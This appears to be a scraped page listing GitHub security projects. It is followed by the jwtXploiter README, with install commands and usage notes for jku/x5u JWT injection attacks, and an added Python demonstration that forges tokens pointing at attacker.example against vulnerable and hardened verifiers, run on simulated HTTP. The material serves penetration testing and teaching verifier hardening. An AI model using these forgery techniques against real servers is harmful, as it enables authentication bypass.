| Project | Stars | Downloads / Repos / Packages using this (as listed) | Most Recent Commit | Total Releases | Latest Release | Open Issues | License | Language | Description |
|---|---|---|---|---|---|---|---|---|---|
| Wpscan | 7,407 | | 7 days ago | | | 50 | other | Ruby | WPScan WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites. Contact us via [email protected] |
| Certificates | 5,159 | 87 | 2 days ago | 245 | September 12, 2022 | 153 | apache-2.0 | Go | 🛡️ A private certificate authority (X.509 & SSH) & ACME server for secure automated certificate management, so you can use TLS everywhere & SSO for SSH. |
| shhgit (stats missing in the listing) | | | | | | | | | Ah shhgit! Find secrets in your code. Secrets detection for your GitHub, GitLab and Bitbucket repositories: www.shhgit.com |
| Cli | 2,931 | 78 | 3 days ago | 265 | September 13, 2022 | 120 | apache-2.0 | Go | 🧰 A zero trust swiss army knife for working with X509, OAuth, JWT, OATH OTP, etc. |
| Itsdangerous | 2,635 | 52,128 / 583 | 25 days ago | 27 | March 24, 2022 | | bsd-3-clause | Python | Safely pass trusted data to untrusted environments and back. |
| Jwt Spring Security Demo | 2,534 | | 3 years ago | | | 2 | mit | Java | A demo for using JWT (Json Web Token) with Spring Security and Spring Boot 2 |
| U2f Zero | 2,284 | | a year ago | | | 27 | other | C | U2F USB token optimized for physical security, affordability, and style |
| Fosite | 2,036 | 50 / 64 | 9 days ago | 278 | April 17, 2022 | 28 | apache-2.0 | Go | Extensible security first OAuth 2.0 and OpenID Connect SDK for Go. |
| Security Csrf | 1,582 | 2,902 / 198 | a month ago | 430 | May 14, 2022 | | mit | PHP | The Security CSRF (cross-site request forgery) component provides a class CsrfTokenManager for generating and validating CSRF tokens. |
| Spring Boot Shiro | 1,496 | | 2 years ago | | | 3 | | Java | |
A tool to test the security of JSON Web Tokens. Test a JWT against all known CVEs;
N.B. Cloning the repository should be avoided except for development purposes!
N.B. The Deb package should be considered beta.

RPM:

```
wget http://andreatedeschi.uno/jwtxploiter/jwtxploiter-1.2.1-1.noarch.rpm
sudo rpm --install jwtxploiter-1.2.1-1.noarch.rpm
```

or, if a previous version is already installed on your machine:

```
sudo rpm --upgrade jwtxploiter-1.2.1-1.noarch.rpm
```

pip:

```
sudo pip install jwtxploiter
```

Deb:

```
wget http://andreatedeschi.uno/jwtxploiter/jwtxploiter_1.2.1-1_all.deb
sudo dpkg -i jwtxploiter_1.2.1-1_all.deb
```

Cloning the repo (development only, see above):

```
git clone https://github.com/DontPanicO/jwtXploiter.git
cd jwtXploiter
./install.sh
```

N.B. The python3-pip package is required to install the dependencies; be sure to have it installed.
Who this tool is for:
- Web application penetration testers / bug bounty hunters
- Developers who need to test the security of the JWTs used in their applications

Not for:
- Students
- For attacks that generate a jwks file, you will find it in the current working directory. Remember to delete such files afterwards to avoid conflicts.
- For jku/x5u injections that need to merge two URLs (the vulnerable server URL and your own), the HERE keyword is required.
- For redirect attacks, the keyword should replace the redirect URL.
- For jku/x5u injections via HTTP header injection, the HERE keyword should be appended to the vulnerable parameter without replacing its value.
- Also, in such cases, be sure to pass the server URL and your own as comma-separated values.
- '/.well-known/jwks.json' is automatically appended to your URL in jku/x5u attacks, so make sure to place the jwks file under that path on your server.
- If you don't want that to happen, use the --manual option. It is compatible only with --jku-basic and --x5u-basic, so you will need to craft the URL manually and pass it to those options, even for attacks that exploit an open redirect or HTTP header injection.
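The notes above describe pointing a token's jku at a key set you host, either directly or through an open redirect on the target. The following script is an added example written for this page, not jwtXploiter's own code: it shows the verifier-side mistake that makes a jku injection work (fetching and trusting whatever key set the token names) beside a hardened verifier, and why an origin allowlist on its own does not stop the redirect variant. Everything environment-specific is assumed for the example: the hostnames api.example and attacker.example, the in-memory HOSTED table and http_get() standing in for HTTP, the /redirect?url= open-redirect endpoint, and the use of symmetric JWKs ("kty": "oct", HS256) so that only the standard library is needed; with RSA key sets the logic is unchanged. The x5u variant is not modelled.

```python
"""Added example (not jwtXploiter's code): a JWT verifier that trusts the jku
header, beside a hardened one, exercised with the basic and open-redirect jku
injections described in the notes above.

Assumptions: symmetric JWKs and HS256 (stdlib only; same logic with RSA keys);
HTTP replaced by HOSTED/http_get(); api.example, attacker.example and the
/redirect?url= endpoint are made up.
"""
import base64
import hashlib
import hmac
import json
from urllib.parse import parse_qs, quote, urlsplit

JWKS_PATH = "/.well-known/jwks.json"   # the path the tool appends to your URL
TARGET = "https://api.example"         # constructed: the vulnerable server
ATTACKER = "https://attacker.example"  # constructed: the server you control
SERVER_SECRET = b"server-signing-key-kept-private"
ATTACKER_SECRET = b"attacker-chosen-key"


def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64u_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jwks_for(kid: str, secret: bytes) -> str:
    """JWKS document holding one symmetric key (RFC 7518 'oct', k = base64url(secret))."""
    return json.dumps({"keys": [{"kty": "oct", "kid": kid, "alg": "HS256", "k": b64u(secret)}]})


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    def enc(obj: dict) -> str:
        return b64u(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = f"{enc(header)}.{enc(payload)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64u(sig)}"


# Constructed stand-in for the network: URL -> response body.
HOSTED = {
    TARGET + JWKS_PATH: jwks_for("srv-1", SERVER_SECRET),
    ATTACKER + JWKS_PATH: jwks_for("evil", ATTACKER_SECRET),
}


def http_get(url: str, follow_redirects: bool = True) -> str:
    """Serve from HOSTED; TARGET/redirect?url=... models an open redirect on the target."""
    parts = urlsplit(url)
    if f"{parts.scheme}://{parts.netloc}" == TARGET and parts.path == "/redirect":
        if not follow_redirects:
            raise ValueError("refusing to follow a redirect while fetching a JWKS")
        return http_get(parse_qs(parts.query)["url"][0], follow_redirects)
    return HOSTED[url]  # KeyError stands for a 404


def verify(token: str, trusted_origins=None, follow_redirects: bool = True) -> bool:
    """Verify an HS256 token with the key set named by its jku header.

    trusted_origins=None is the vulnerable behaviour: any jku is fetched and trusted.
    An allowlist plus follow_redirects=False is the hardened behaviour.
    """
    h, p, s = token.split(".")
    header = json.loads(b64u_decode(h))
    if header.get("alg") != "HS256":  # never let the token pick the algorithm
        return False
    parts = urlsplit(header["jku"])
    if trusted_origins is not None and f"{parts.scheme}://{parts.netloc}" not in trusted_origins:
        return False
    try:
        keys = {k["kid"]: k for k in json.loads(http_get(header["jku"], follow_redirects))["keys"]}
        secret = b64u_decode(keys[header["kid"]]["k"])
    except (KeyError, ValueError):
        return False
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64u_decode(s))


def forge(jku: str) -> str:
    """Attacker token: signed with the attacker's key, jku pointing at the attacker's JWKS."""
    return sign_hs256({"alg": "HS256", "kid": "evil", "jku": jku}, {"sub": "admin"}, ATTACKER_SECRET)


def basic_injection() -> tuple:
    """--jku-basic style: jku names the attacker host directly."""
    token = forge(ATTACKER + JWKS_PATH)
    return verify(token), verify(token, trusted_origins={TARGET})


def redirect_injection() -> tuple:
    """--jku-redirect style: HERE in the target's open redirect becomes the attacker JWKS URL."""
    jku = (TARGET + "/redirect?url=HERE").replace("HERE", quote(ATTACKER + JWKS_PATH, safe=""))
    token = forge(jku)
    return (verify(token, trusted_origins={TARGET}),
            verify(token, trusted_origins={TARGET}, follow_redirects=False))


def legitimate() -> bool:
    """A token the server itself issued still verifies under the hardened rules."""
    token = sign_hs256({"alg": "HS256", "kid": "srv-1", "jku": TARGET + JWKS_PATH},
                       {"sub": "alice"}, SERVER_SECRET)
    return verify(token, trusted_origins={TARGET}, follow_redirects=False)


if __name__ == "__main__":
    print("basic jku injection (vulnerable, allowlisted):", basic_injection())       # (True, False)
    print("via open redirect (allowlist only, no redirects):", redirect_injection())  # (True, False)
    print("legitimate token under hardened rules:", legitimate())                    # True
```

Running it gives (True, False) for the basic injection (the verifier that fetches any jku accepts the forged token, the allowlisted one rejects it), (True, False) for the redirect variant (the allowlist is bypassed as long as the fetcher follows the target's redirect to the attacker host, and closed once it refuses redirects), and True for the server's own token. The HERE replacement in redirect_injection() mirrors the substitution the notes describe for redirect attacks, including the automatic /.well-known/jwks.json suffix on your URL.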
Look at the wiki for detailed documentation.